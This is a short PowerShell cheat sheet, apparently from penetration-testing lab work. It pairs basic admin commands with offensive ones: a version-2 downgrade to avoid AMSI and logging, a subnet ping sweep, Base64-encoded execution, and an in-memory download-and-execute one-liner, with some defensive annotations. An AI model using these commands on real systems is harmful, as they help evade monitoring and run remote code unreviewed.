powershell Get-ExecutionPolicy
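# Get-AuthenticodeSignature is the full cmdlet name; its Status property reads Valid only when the signature verifies.
powershell Get-AuthenticodeSignature c:\temp\myscript.ps1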
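Specify version (the version 2 engine has no script block logging and no AMSI; where it is still installed, remove the Windows PowerShell 2.0 feature and alert on -Version 2 in process command lines)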
powershell -Version 2
cat
powershell Get-Content C:\Windows\System32\Inetsrv\Config\administration.config
ls
powershell Get-ChildItem -Path C:\Windows\System32\Inetsrv\Config
rm
powershell Remove-Item ‘C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\test2.aspx’
tasklist
powershell Get-Process lsass | Format-List *
Grep in files
powershell Select-String -Path *.ts -Pattern "@select"
netstat
powershell Get-NetTCPConnection
netstat listening ports
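# -State Listen returns every listening socket. The earlier RemoteAddress -eq "0.0.0.0" filter
# dropped IPv6 listeners, whose remote address is "::".
powershell Get-NetTCPConnection -State Listen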
ping sweep
powershell (1..40) | % {$ip=”192.168.0.$_”; Write-output “$IP $(test-connection -computername “$ip” -quiet -count 1)”}
base64 encoding commands (if format issues)
powershell -enc <base64encoded>
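Online encoder: https://raikia.com/tool-powershell-encoder/ (-enc expects the Base64 of the UTF-16LE command text; encode locally when the command contains hostnames or credentials, since an online tool receives whatever is pasted into it)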
systeminfo
powershell Get-ComputerInfo
powershell Get-Hotfix
Head and tail (xxx stands for any command whose output you want to trim)
xxx | select -first 20
xxx | select -last 20
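SMTP (Send-MailMessage needs -SmtpServer, or $PSEmailServer set, to know which server to use; Microsoft marks the cmdlet obsolete because it cannot guarantee a secure connection to the SMTP server)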
powershell Send-MailMessage -From “ahope@rastalabs.local” -To “ahope@rastalabs.local” -Subject “Test email” -Body “This is a test email”
Download and execute script
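This example fetches a port scanner script and runs it in memory. The URL tracks the master branch, so the code can change between runs; read the script and pin a commit hash before running it. Script block logging (event ID 4104) and AMSI record what a download-and-execute one-liner like this actually runs.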
powershell –nop –c “iex(New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/securethelogs/PSpanner/master/PSpanner.ps1’)”